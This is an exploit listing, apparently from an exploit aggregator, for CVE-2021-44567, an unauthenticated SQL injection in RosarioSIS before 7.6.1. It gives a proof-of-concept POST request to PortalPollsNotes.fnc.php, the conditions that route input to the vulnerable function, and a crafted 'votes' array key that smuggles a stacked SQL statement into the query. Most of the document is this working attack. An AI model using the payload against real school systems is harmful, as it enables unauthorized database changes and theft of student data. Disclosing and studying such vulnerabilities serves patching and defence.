Exploit for RosarioSIS SQL Injection CVE-2021-44567

Name: Exploit for RosarioSIS SQL Injection CVE-2021-44567
Rating: 5 (106 reviews)

2025-04-11 | CVSS 9.8

## https://sploitus.com/exploit?id=PACKETSTORM:190426
# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis]
    # Software Link: [https://gitlab.com/francoisjacquet/rosariosis]
    # Version: [7.6] 
    # Tested on: [Ubuntu Windows]
    # CVE : [CVE-2021-44567]
    
    PoC:
    POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
    X-Requested-With: XMLHttpRequest
    
    constrain and some flow:
    isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) 
    
    votes['; CREATE TABLE aaa(t text) --]=1